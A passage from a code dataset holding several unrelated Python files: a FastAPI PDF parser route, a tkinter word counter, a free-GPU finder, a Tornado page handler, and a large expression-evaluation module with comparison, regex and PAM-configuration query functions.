name='product_list'),\n]\n","repo_name":"iamvinitk/Online-Retail","sub_path":"kompany/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"5554043440","text":"import os\nimport random\nimport string\nfrom enum import Enum\n\nfrom fastapi import APIRouter, UploadFile, File, Depends\nfrom pdfminer.pdfparser import PDFSyntaxError\nfrom starlette.responses import JSONResponse\n\nfrom app.db.crud import CrudDatabase\nfrom app.utils.pdfparser import shop_parse_pdf, user_parse_pdf\nfrom app.utils.pdfsaver import chunked_copy, generate_path_file\n\nfile_router = APIRouter()\n\n\nclass ParseEnum(str, Enum):\n SHOP = \"shop\"\n USER = \"user\"\n\n\n@file_router.post(\"/upload/document\")\nasync def parse_pdf(document_type: ParseEnum, file: UploadFile = File(...)):\n exception = JSONResponse(\n status_code=400,\n content={\n \"content\": \"An error occurred while trying to disband the document,\"\n \" please try again later.\"\n }\n )\n\n if document_type == ParseEnum.SHOP:\n try:\n result = shop_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n if document_type == ParseEnum.USER:\n try:\n result = user_parse_pdf(path=file.file)\n return result\n except ValueError:\n return exception\n\n\n","repo_name":"SilentSt/AnoFoodsharingREST","sub_path":"app/routes/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4788275670","text":"\nimport tkinter as tk\n\nframe = tk.Tk()\nframe.title(\"Text counter\")\nframe.geometry('400x200')\n\n \ndef printInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Words \"+str(len(inp.split())))\n\ndef letterInput():\n inp = inputtxt.get(1.0, \"end-1c\")\n lbl.config(text = \"Characters \"+str(len(inp)))\n \n\ninputtxt = tk.Text(frame, height = 5, width = 20)\n \ninputtxt.pack()\n \n\nprintButton = tk.Button(frame,text = \"Check how many words are there:\", command = printInput)\nprintButton.pack()\nletterButton = tk.Button(frame,text =\"check how many letters are there:\",command = letterInput)\nletterButton.pack()\n\nlbl = tk.Label(frame, text = \"\")\nlbl.pack()\nframe.mainloop()\n","repo_name":"DhruvaNaik/words-and-letter-counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15528695253","text":"from subprocess import Popen, PIPE\nimport torch\n\ndef get_first_free_gpu():\n if torch.cuda.is_available():\n gpu_output = Popen([\"nvidia-smi\", \"-q\", \"-d\", \"PIDS\"], stdout=PIPE, encoding=\"utf-8\")\n gpu_processes = Popen([\"grep\", \"Processes\"], stdin=gpu_output.stdout, stdout=PIPE, encoding=\"utf-8\")\n gpu_output.stdout.close()\n processes_output = gpu_processes.communicate()[0]\n for i, line in enumerate(processes_output.strip().split(\"\\n\")):\n if line.endswith(\"None\"):\n print(f\"Found Free GPU ID: {i}\")\n cuda_device = f\"cuda:{i}\"\n torch.cuda.set_device(cuda_device)\n return torch.device(cuda_device)\n print(\"WARN - No Free GPU found! 
Running on CPU instead...\")\n    return torch.device(\"cpu\")\n","repo_name":"technion-nlp-lab/utils","sub_path":"get_first_free_gpu.py","file_name":"get_first_free_gpu.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"75087281641","text":"from tornado import web, ioloop, httpserver\nfrom handlers import BaseHandler\nfrom models import user_mod, log_mod\nfrom lib import alg_list\nimport tornado\n\n\nclass AlgShowHandler(BaseHandler.BaseHandler):\n    @tornado.web.authenticated\n    def get(self):\n        username = tornado.escape.json_decode(self.current_user)\n        usermod = user_mod.UserModel()\n        userinfo = usermod.find_user(username)\n        curid = self.get_argument('algid')\n\n        strh = str(userinfo['haveseen'])\n        print(strh)\n        if strh == 'None':\n            strh = curid\n        else:\n            haveseen = userinfo['haveseen'].split(' ')\n            if curid not in haveseen:\n                strh += ' ' + curid\n\n        usermod.update_user_haveseen(userinfo['id'], strh)\n        usermod.update_user_lastseen(userinfo['id'], curid)\n        self.render(\n            'algorithm.html',\n            alg_list=alg_list.alg,\n            username=username,\n            curid=curid,\n        )\n","repo_name":"acptek/VisualPanel","sub_path":"handlers/AlgorithmShow.py","file_name":"AlgorithmShow.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"33578535977","text":"from __future__ import print_function\nimport sys\nimport os\nimport re\nimport inspect\nimport six\nfrom AssimCtypes import ADDR_FAMILY_IPV4, ADDR_FAMILY_IPV6\nfrom AssimCclasses import pyNetAddr, pyConfigContext\n\n#\n#\nclass GraphNodeExpression(object):\n    \"\"\"We implement Graph node expressions - we aren't a real class\"\"\"\n\n    functions = {}\n\n    def __init__(self):\n        raise NotImplementedError(\"This is not a real class\")\n\n    @staticmethod\n    def evaluate(expression, context):\n        \"\"\"\n        Evaluate an expression.\n        It can be:\n        None - return None\n        'some-value' -- return some-value (it's a constant)\n        or an expression to find in values or graphnodes\n        or @functionname(args) - for defined functions...\n\n        We may add other kinds of expressions in the future...\n        \"\"\"\n        if not isinstance(expression, six.string_types):\n            # print('RETURNING NONSTRING:', expression, file=sys.stderr)\n            return expression\n        expression = str(expression.strip())\n        if not hasattr(context, \"get\") or not hasattr(context, \"__setitem__\"):\n            context = ExpressionContext(context)\n        # print('''EVALUATE('%s') (%s):''' % (expression, type(expression))\n        # The value of this parameter is a constant...\n        if expression.startswith('\"'):\n            if expression[-1] != '\"':\n                print(\"unquoted constant string '%s'\" % expression, file=sys.stderr)\n            # print('''Constant string: \"%s\"''' % (expression[1:-1]), file=sys.stderr)\n            return expression[1:-1] if expression[-1] == '\"' else None\n        if (expression.startswith(\"0x\") or expression.startswith(\"0X\")) and len(expression) > 3:\n            return int(expression[2:], 16)\n        if expression.isdigit():\n            return int(expression, 8) if expression.startswith(\"0\") else int(expression)\n        if expression.find(\"(\") >= 0:\n            value = GraphNodeExpression.functioncall(expression, context)\n            context[expression] = value\n            return value\n        # if expression.startswith('$'):\n        # print('RETURNING VALUE OF %s' % expression[1:], file=sys.stderr)\n        # print('Context is %s' % str(context), file=sys.stderr)\n        # print('RETURNING VALUE OF %s = %s'\\, file=sys.stderr)\n        # % (expression,
context.get(expression[1:], None))\n value = context.get(expression[1:], None) if expression.startswith(\"$\") else expression\n return value\n\n # pylint R0912: too many branches - really ought to write a lexical analyzer and parser\n # On the whole it would be simpler and easier to understand...\n # pylint: disable=R0912\n @staticmethod\n def _compute_function_args(arglist, context):\n \"\"\"Compute the arguments to a function call. May contain function calls\n and other GraphNodeExpression, or quoted strings...\n Ugly lexical analysis.\n Really ought to write a real recursive descent parser...\n \"\"\"\n # print('_compute_function_args(%s)' % str(arglist), file=sys.stderr)\n args = []\n argstrings = []\n nestcount = 0\n arg = \"\"\n instring = False\n prevwasquoted = False\n for char in arglist:\n if instring:\n if char == '\"':\n instring = False\n prevwasquoted = True\n else:\n arg += char\n elif nestcount == 0 and char == '\"':\n instring = True\n elif nestcount == 0 and char == \",\":\n if prevwasquoted:\n prevwasquoted = False\n args.append(arg)\n argstrings.append(arg)\n else:\n arg = arg.strip()\n if arg == \"\":\n continue\n # print(\"EVALUATING [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n arg = \"\"\n elif char == \"(\":\n nestcount += 1\n # print(\"++nesting: %d\" % (nestcount), file=sys.stderr)\n arg += char\n elif char == \")\":\n arg += char\n nestcount -= 1\n # print(\"--nesting: %d\" % (nestcount), file=sys.stderr)\n if nestcount < 0:\n return (None, None)\n if nestcount == 0:\n if prevwasquoted:\n # print('_compute_function_args: QUOTED argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n arg = arg.strip()\n # print(\"GnE.functioncall [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.functioncall(arg, context))\n argstrings.append(arg)\n arg = \"\"\n else:\n arg += char\n if nestcount > 0 or instring:\n # print(\"Nestcount: %d, instring: %s\" % (nestcount, instring), file=sys.stderr)\n return (None, None)\n if arg != \"\":\n if prevwasquoted:\n # print('_compute_function_args: quoted argument: \"%s\"' % arg, file=sys.stderr)\n args.append(arg)\n else:\n # print(\"GnE.evaluate [%s]\" % arg, file=sys.stderr)\n args.append(GraphNodeExpression.evaluate(arg, context))\n argstrings.append(arg)\n # print('RETURNING [%s] [%s]' % (args, argstrings), file=sys.stderr)\n return (args, argstrings)\n\n @staticmethod\n def functioncall(expression, context):\n \"\"\"Performs a function call for our expression language\n\n Figures out the function name, and the arguments and then\n calls that function with those arguments.\n\n All our defined functions take an argv argument string first, then an\n ExpressionContext argument.\n\n This parsing is incredibly primitive. 
Feel free to improve it ;-)\n\n \"\"\"\n expression = expression.strip()\n if expression[-1] != \")\":\n print(\"%s does not end in )\" % expression, file=sys.stderr)\n return None\n expression = expression[: len(expression) - 1]\n (funname, arglist) = expression.split(\"(\", 1)\n # print('FUNCTIONCALL: %s(%s)' % (funname, arglist), file=sys.stderr)\n funname = funname.strip()\n arglist = arglist.strip()\n #\n # At this point we have all our arguments as a string , but it might contain\n # other (nested) calls for us to evaluate\n #\n # print('FunctionCall: arglist: [%s]' % (arglist), file=sys.stderr)\n args, _argstrings = GraphNodeExpression._compute_function_args(arglist, context)\n # print('args: %s' % (args), file=sys.stderr)\n # print('_argstrings: %s' % (_argstrings), file=sys.stderr)\n if args is None:\n return None\n\n if funname.startswith(\"@\"):\n funname = funname[1:]\n if funname not in GraphNodeExpression.functions:\n print(\"BAD FUNCTION NAME: %s\" % funname, file=sys.stderr)\n return None\n # print('ARGSTRINGS %s(%s)' % (funname, str(_argstrings)), file=sys.stderr)\n # print('ARGS: %s' % (str(args)), file=sys.stderr)\n ret = GraphNodeExpression.functions[funname](args, context)\n # print('%s(%s) => %s' % (funname, args, ret), file=sys.stderr)\n return ret\n\n @staticmethod\n def FunctionDescriptions():\n \"\"\"Return a list of tuples of (funcname, docstring) for all our GraphNodeExpression\n defined functions. The list is sorted by function name.\n \"\"\"\n names = sorted(GraphNodeExpression.functions.keys())\n ret = []\n for name in names:\n ret.append((name, inspect.getdoc(GraphNodeExpression.functions[name])))\n return ret\n\n @staticmethod\n def RegisterFun(function):\n \"Function to register other functions as built-in GraphNodeExpression functions\"\n GraphNodeExpression.functions[function.__name__] = function\n return function\n\n\nclass ExpressionContext(object):\n \"\"\"This class defines a context for an expression evaluation.\n There are three parts to it:\n 1) A cache of values which have already been computed\n 2) A scope/context for expression evaluation - a default name prefix\n 3) A set of objects which implement the 'get' operation to be used in\n evaluating values of names\n\n We act like a dict, implementing these member functions:\n __iter__, __contains__, __len__, __getitem__ __setitem__, __delitem__,\n get, keys, has_key, clear, items\n \"\"\"\n\n def __init__(self, objects, prefix=None):\n \"Initialize our ExpressionContext\"\n self.objects = objects if isinstance(objects, (list, tuple)) else (objects,)\n self.prefix = prefix\n self.values = {}\n\n def __str__(self):\n ret = \"ExpressionContext(\"\n delim = \"[\"\n for obj in self.objects:\n ret += \"%s%s\" % (delim, str(obj))\n delim = \", \"\n ret += \"])\"\n return ret\n\n def keys(self):\n \"\"\"Return the complete set of keys in all our constituent objects\"\"\"\n retkeys = set()\n for obj in self.objects:\n for key in obj:\n retkeys.add(key)\n return retkeys\n\n @staticmethod\n def _fixvalue(v):\n \"Fix up a return value to avoid unicode values...\"\n return v\n if not isinstance(v, str) and hasattr(v, \"__iter__\") and not hasattr(v, \"__getitem__\"):\n ret = []\n for item in v:\n ret.append(ExpressionContext._fixvalue(item))\n return ret\n return v\n\n def get(self, key, alternative=None):\n \"\"\"Return the value associated with a key - cached or otherwise\n and cache it.\"\"\"\n if key in self.values:\n return self.values[key]\n for obj in self.objects:\n ret = None\n try:\n # print('GETTING 
%s in %s: %s' % (key, type(obj), obj), file=sys.stderr)\n ret = obj.get(key, None)\n if ret is None and hasattr(obj, \"deepget\"):\n ret = obj.deepget(key, None)\n # print('RETURNED %s' % ret, file=sys.stderr)\n # Too general exception catching...\n # pylint: disable=W0703\n except Exception as e:\n ret = None\n print(\"OOPS: self.objects = %s / exception %s\" % (str(self.objects), e), sys.stderr)\n print(\"OOPS: OUR object = %s (%s)\" % (str(obj), type(obj)), file=sys.stderr)\n ret = ExpressionContext._fixvalue(ret)\n if ret is not None:\n self.values[key] = ret\n return ret\n if self.prefix is not None:\n ret = ExpressionContext._fixvalue(obj.get(\"%s.%s\" % (self.prefix, key), None))\n if ret is not None:\n self.values[key] = ret\n return ret\n return alternative\n\n def clear(self):\n \"Clear our cached values\"\n self.values = {}\n\n def items(self):\n \"Return all items from our cache\"\n return self.values.items()\n\n def __iter__(self):\n \"Yield each key from self.keys() in turn\"\n for key in self.keys():\n yield key\n\n def __contains__(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def has_key(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def __len__(self):\n \"Return the number of keys in our objects\"\n return len(self.keys())\n\n def __getitem__(self, key):\n \"Return the given item, or raise KeyError if not found\"\n ret = self.get(key, None)\n if ret is None:\n raise KeyError(key)\n return ret\n\n def __setitem__(self, key, value):\n \"Cache the value associated with this key\"\n self.values[key] = value\n\n def __delitem__(self, key):\n \"Remove the cache value associated with this key\"\n del self.values[key]\n\n\n@GraphNodeExpression.RegisterFun\ndef IGNORE(_ignoreargs, _ignorecontext):\n \"\"\"Function to ignore its argument(s) and return True all the time.\n This is a special kind of no-op in that it is used to override\n and ignore an underlying rule. It is expected that its arguments\n will explain why it is being ignored in this rule set.\n \"\"\"\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef EQ(args, _context):\n \"\"\"Function to return True if each non-None argument in the list matches\n every non-None argument and at least one of its subsequent arguments are not None.\n \"\"\"\n # print('EQ(%s) =>?' 
% str(args), file=sys.stderr)\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if not isinstance(val, type(val0)):\n if str(val0) != str(val):\n return False\n elif val0 != val:\n return False\n anymatch = True\n # print('EQ(%s) => %s' % (str(args), str(anymatch)), file=sys.stderr)\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef NE(args, _context):\n \"\"\"Function to return True if no non-None argument in the list matches\n the first one or None if all subsequent arguments are None\"\"\"\n # print('NE(%s, %s)' % (args[0], str(args[1:])), file=sys.stderr)\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n # print('+NE(%s, %s) (%s, %s)' % (val0, val, type(val0), type(val)), file=sys.stderr)\n if val is None:\n return None\n if val0 == val or str(val0) == str(val):\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LT(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n less than the first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 >= val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GT(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n greater than the first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 <= val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LE(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n less than or equal to first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 > val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GE(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n greater than or equal to first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 < val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef IN(args, _context):\n \"\"\"Function to return True if first argument is in the list that follows.\n If the first argument is iterable, then each element in it must be 'in'\n the list that follows.\n \"\"\"\n\n val0 = args[0]\n if val0 is None:\n return None\n if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n # Iterable\n anyTrue = False\n for elem in val0:\n if elem is None:\n continue\n if elem not in args[1:] and str(elem) not in args[1:]:\n return False\n anyTrue = True\n return True if anyTrue else None\n # Not an iterable: string, int, NoneType, etc.\n if val0 is None:\n return None\n # print(type(val0), val0, type(args[1]), args[1], file=sys.stderr)\n return val0 in args[1:] or str(val0) in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOTIN(args, _context):\n \"Function to return True if first argument is NOT in the list that follows\"\n val0 = args[0]\n if val0 is None:\n 
return None\n    if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n        # Iterable\n        for elem in val0:\n            if elem in args[1:] or str(elem) in args[1:]:\n                return False\n        return True\n    return val0 not in args[1:] and str(val0) not in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOT(args, _context):\n    \"Function to Negate the Truth value of its single argument\"\n    try:\n        val0 = args[0]\n    except TypeError:\n        val0 = args\n    return None if val0 is None else not val0\n\n\ndef _str_to_regexflags(s):\n    r\"\"\"Transform a string of single character regex flags to the corresponding integer.\n    Note that the flag names are all the Python single character flag names from the 're' module.\n    They are as follows:\n    A perform 8-bit ASCII-only matching (Python 3 only)\n    I Perform case-insensitive matching\n    L Use locale settings for \\w, \\W, \\b and \\B\n    M Multi-line match - allow ^ and $ to apply to individual lines in the string\n    S Allow the dot character to also match a newline\n    U Uses information from the Unicode character properties for \\w, \\W, \\b and \\B.\n        (python 2 only)\n    X Ignores unescaped whitespace and comments in the pattern string.\n    \"\"\"\n\n    flags = 0\n    if s is not None:\n        for char in s:\n            if char == \"A\":\n                if hasattr(re, \"ASCII\"):\n                    flags |= getattr(re, \"ASCII\")\n            elif char == \"I\":\n                flags |= re.IGNORECASE\n            elif char == \"L\":\n                flags |= re.LOCALE\n            elif char == \"M\":\n                flags |= re.MULTILINE\n            elif char == \"S\":\n                flags |= re.DOTALL\n            elif char == \"U\":\n                flags |= re.UNICODE\n            elif char == \"X\":\n                flags |= re.VERBOSE\n    return flags\n\n\n_regex_cache = {}\n\n\ndef _compile_and_cache_regex(regexstr, flags=None):\n    \"Compile and cache a regular expression with the given flags\"\n    cache_key = \"%s//%s\" % (str(regexstr), str(flags))\n    if cache_key in _regex_cache:\n        regex = _regex_cache[cache_key]\n    else:\n        regex = re.compile(regexstr, _str_to_regexflags(flags))\n        _regex_cache[cache_key] = regex\n    return regex\n\n\n@GraphNodeExpression.RegisterFun\ndef match(args, _context):\n    \"\"\"Function to return True if first argument matches the second argument (a regex)\n    - optional 3rd argument is RE flags\"\"\"\n    lhs = args[0]\n    rhs = args[1]\n    if lhs is None or rhs is None:\n        return None\n    flags = args[2] if len(args) > 2 else None\n    regex = _compile_and_cache_regex(rhs, flags)\n    return regex.search(str(lhs)) is not None\n\n\n@GraphNodeExpression.RegisterFun\ndef argequals(args, context):\n    \"\"\"\n    usage: argequals name-to-search-for [list-to-search]\n\n    A function which searches a list for an argument of the form name=value.\n    The value '$argv' is the default name of the list to search.\n    If there is a second argument, then that second argument is an expression\n    expected to yield an iterable to search in for the name=value string instead of '$argv'\n    \"\"\"\n    # print('ARGEQUALS(%s)' % (str(args)), file=sys.stderr)\n    if len(args) > 2 or len(args) < 1:\n        return None\n    definename = args[0]\n    argname = args[1] if len(args) >= 2 else \"$argv\"\n    listtosearch = GraphNodeExpression.evaluate(argname, context)\n    # print('SEARCHING in %s FOR %s in %s' % (argname, definename, listtosearch), file=sys.stderr)\n    if listtosearch is None:\n        return None\n    prefix = \"%s=\" % definename\n    # W0702: No exception type specified for except statement\n    # pylint: disable=W0702\n    try:\n        for elem in listtosearch:\n            if elem.startswith(prefix):\n                return elem[len(prefix) :]\n    except: # No matter the cause of failure, return None...\n        pass\n    return
None\n\n\n@GraphNodeExpression.RegisterFun\ndef argmatch(args, context):\n \"\"\"\n usage: argmatch regular-expression [list-to-search [regex-flags]]\n\n Argmatch searches a list for an value that matches a given regex.\n The regular expression is given by the argument in args, and the list 'argv'\n defaults to be the list of arguments to be searched.\n\n If there are two arguments in args, then the first argument is the\n array value to search in for the regular expression string instead of 'argv'\n\n If the regex contains a parenthesized groups, then the value of the first such group\n is returned, otherwise the part of the argument that matches the regex is returned.\n\n Note that this regular expression is 'anchored' that is, it starts with the first character\n in the argument. If you want it to be floating, then you may want to start your regex\n with '.*' and possibly parenthesize the part you want to return.\n \"\"\"\n # print('ARGMATCH(%s)' % (str(args)), file=sys.stderr)\n # print('ARGMATCHCONTEXT(%s)' % (str(context)), file=sys.stderr)\n if len(args) > 3 or len(args) < 1:\n return None\n regexstr = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n flags = args[2] if len(args) >= 3 else None\n listtosearch = GraphNodeExpression.evaluate(argname, context)\n if listtosearch is None:\n return None\n\n # W0702: No exception type specified for except statement\n # pylint: disable=W0702\n try:\n # print(regex: /%s/' % regexstr, file=sys.stderr)\n regex = _compile_and_cache_regex(regexstr, flags)\n # print('Matching against list %s' % (str(listtosearch)), file=sys.stderr)\n for elem in listtosearch:\n # print('Matching %s against %s' % (regexstr, elem), file=sys.stderr)\n matchobj = regex.match(elem)\n if matchobj:\n # Did they specify any parenthesized groups?\n if len(matchobj.groups()) > 0:\n # yes - return the (first) parenthesized match\n return matchobj.groups()[0]\n else:\n # no - return everything matched\n return matchobj.group()\n except: # No matter the cause of failure, return None...\n # That includes ill-formed regular expressions...\n pass\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef flagvalue(args, context):\n \"\"\"\n usage: flagvalue flag-name [list-to-search]\n A function which searches a list for a -flag and returns\n the value of the string which is the next argument.\n The -flag is given by the argument in args, and the list 'argv'\n is assumed to be the list of arguments.\n If there are two arguments in args, then the first argument is the\n array value to search in for the -flag string instead of 'argv'\n The flag given must be the entire flag complete with - character.\n For example -X or --someflag.\n \"\"\"\n if len(args) > 2 or len(args) < 1:\n return None\n flagname = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n\n progargs = GraphNodeExpression.evaluate(argname, context)\n argslen = len(progargs)\n flaglen = len(flagname)\n for pos in range(0, argslen):\n progarg = progargs[pos]\n progarglen = len(progarg)\n if progarg.startswith(flagname):\n if progarg == flagname:\n # -X foobar\n if (pos + 1) < argslen:\n return progargs[pos + 1]\n elif flaglen == 2 and progarglen > flaglen:\n # -Xfoobar -- single character flags only\n return progarg[2:]\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef OR(args, context):\n \"\"\"\n A function which evaluates each expression in turn, and returns the value\n of the first expression which is not None - or None\n \"\"\"\n # print('OR(%s)' % (str(args)), file=sys.stderr)\n if 
len(args) < 1:\n        return None\n    anyfalse = False\n    for arg in args:\n        value = GraphNodeExpression.evaluate(arg, context)\n        if value is not None:\n            if value:\n                return value\n            else:\n                anyfalse = True\n    return False if anyfalse else None\n\n\n@GraphNodeExpression.RegisterFun\ndef AND(args, context):\n    \"\"\"\n    A function which evaluates each expression in turn; it returns False for the\n    first expression which evaluates to False, None if any expression is None\n    (and none are False), and True otherwise.\n    \"\"\"\n    # print('AND(%s)' % (str(args)), file=sys.stderr)\n    argisnone = True\n    if len(args) < 1:\n        return None\n    for arg in args:\n        value = GraphNodeExpression.evaluate(arg, context)\n        if value is None:\n            argisnone = None\n        elif not value:\n            # print('AND(%s) => False' % (str(args)), file=sys.stderr)\n            return False\n    # print('AND(%s) => %s' % (str(args), argisnone), file=sys.stderr)\n    return argisnone\n\n\n@GraphNodeExpression.RegisterFun\ndef ATTRSEARCH(args, context):\n    \"\"\"\n    Search our first context object for an attribute with the given name and (if supplied) value.\n    If 'value' is None, then we simply search for the given name.\n    We return True if we found what we were looking for, and False otherwise.\n\n    The object to search in is args[0], the name is args[1],\n    and the optional desired value is args[2].\n    \"\"\"\n    return True if FINDATTRVALUE(args, context) else False\n    # return FINDATTRVALUE(args, context) is not None\n    # These are equivalent. Not sure which is clearer...\n\n\n@GraphNodeExpression.RegisterFun\ndef FINDATTRVALUE(args, _context):\n    \"\"\"\n    Search our first context object for an attribute with the given name and (if supplied) value.\n    We return the value found, if it is in the context objects, or None if it is not.\n    If 'value' is None, then we simply search for the given name.\n\n    We return True if the desired value is None, and so is the value we found -\n    otherwise we return the value associated with 'name' or None if not found.\n\n    The object to search in is args[0], the name is args[1],\n    and the optional desired value is args[2].\n    \"\"\"\n    if len(args) not in (2, 3):\n        print(\"WRONG NUMBER OF ARGUMENTS (%d) TO FINDATTRVALUE\" % (len(args)), file=sys.stderr)\n        return None\n    desiredvalue = args[2] if len(args) > 2 else None\n    return _attrfind(args[0], args[1], desiredvalue)\n\n\ndef _is_scalar(obj):\n    'Return True if this object is a pyConfigContext/JSON \"scalar\"'\n    return isinstance(obj, (six.string_types, int, float, bool, pyNetAddr))\n\n\ndef _attrfind(obj, name, desiredvalue):\n    \"\"\"\n    Recursively search the given object for an attribute with the given name\n    and value.
If 'value' is None, then we simply search for the given name.\n\n    We return True if the desired value is None, and the value we found is also None -\n    otherwise we return the value associated with 'name' or None if not found.\n    \"\"\"\n    if _is_scalar(obj):\n        return None\n    if hasattr(obj, \"__getitem__\"):\n        for key in obj:\n            keyval = obj[key]\n            if key == name:\n                if desiredvalue is None:\n                    return keyval if keyval is not None else True\n                elif keyval == desiredvalue or str(keyval) == str(desiredvalue):\n                    # We use str() to allow pyNetAddr objects to compare equal\n                    # and the possibility of type mismatches (strings versus integers, for example)\n                    # This may also improve the chance of floating point compares working as\n                    # intended.\n                    return keyval\n    elif hasattr(obj, \"__iter__\"):\n        for elem in obj:\n            ret = _attrfind(elem, name, desiredvalue)\n            if ret is not None:\n                return ret\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef PAMMODARGS(args, _context):\n    \"\"\"\n    We pass the following arguments to PAMSELECTARGS:\n        section - the section value to select from\n        service - service type to search for\n        module - the module to select arguments from\n        argument - the arguments to select\n\n    We return the arguments from the first occurrence of the module that we find.\n    \"\"\"\n    # print('PAMMODARGS(%s)' % (str(args)), file=sys.stderr)\n    if len(args) != 4:\n        print(\"WRONG NUMBER OF ARGUMENTS (%d) TO PAMMODARGS\" % (len(args)), file=sys.stderr)\n        return False\n    section = args[0]\n    reqservice = args[1]\n    reqmodule = args[2]\n    reqarg = args[3]\n\n    if section is None:\n        # print('Section is None in PAM object', file=sys.stderr)\n        return None\n    # Each section is a list of lines\n    for line in section:\n        # Each line is a dict with potential keys of:\n        # - service: a keyword saying what kind of service\n        # - filename:(only for includes)\n        # - type: dict of keywords (requisite, required, optional, etc)\n        # - module: Module dict keywords with:\n        # - path - pathname of module ending in .so\n        # - other arguments as per the module's requirements\n        # simple flags without '=' values show up with True as value\n        #\n        if \"service\" not in line or line[\"service\"] != reqservice:\n            # print('Service %s not in PAM line %s' % (reqservice, str(line)), file=sys.stderr)\n            continue\n        if \"module\" not in line:\n            # print('\"module\" not in PAM line %s' % str(line), file=sys.stderr)\n            continue\n        if \"path\" not in line[\"module\"]:\n            # print('\"path\" not in PAM module %s' % str(line['module']), file=sys.stderr)\n            # print('\"path\" not in PAM line %s' % str(line), file=sys.stderr)\n            continue\n        modargs = line[\"module\"]\n        if reqmodule != \"ANY\" and (\n            modargs[\"path\"] != reqmodule and modargs[\"path\"] != (reqmodule + \".so\")\n        ):\n            # print('Module %s not in PAM line %s' % (reqmodule, str(line)), file=sys.stderr)\n            continue\n        ret = modargs[reqarg] if reqarg in modargs else None\n        if ret is None and reqmodule == \"ANY\":\n            continue\n        # print('RETURNING %s from %s' % (ret, str(line)), file=sys.stderr)\n        return ret\n    return None\n\n\n@GraphNodeExpression.RegisterFun\ndef MUST(args, _unused_context):\n    \"Return True if all args are True.
A None arg is the same as False to us\"\n    # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n    if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n        args = (args,)\n    for arg in args:\n        if arg is None or not arg:\n            # print('+++MUST returns FALSE', file=sys.stderr)\n            return False\n    # print('+++MUST returns TRUE', file=sys.stderr)\n    return True\n\n\n@GraphNodeExpression.RegisterFun\ndef NONEOK(args, _unused_context):\n    \"Return True if all args are True or None - that is, if no args are False\"\n    # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n    if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n        args = (args,)\n    for arg in args:\n        if arg is not None and not arg:\n            # print('+++NONEOK returns FALSE', file=sys.stderr)\n            return False\n    # print('+++NONEOK returns TRUE', file=sys.stderr)\n    return True\n\n\n@GraphNodeExpression.RegisterFun\ndef FOREACH(args, context):\n    \"\"\"Applies the (string) expression across all values in the context,\n    returning the 'AND' of the evaluation of the expression-evaluations\n    across the top level values in the context. It stops evaluation on\n    the first False return.\n\n    The final argument is the expression (predicate) to be evaluated. Any\n    previous arguments in 'args' are expressions to be evaluated in the context\n    'context' then used as the 'context' for the expression in this FOREACH.\n    Note that this desired predicate is a _string_, which is then evaluated\n    (like 'eval'). It is not a normal expression, but a string containing\n    an expression. You _will_ have to quote it.\n\n    When given a single argument, it will evaluate the string expression\n    for each of the top-level values in the object. Normally this would be the 'data'\n    portion of a discovery object.
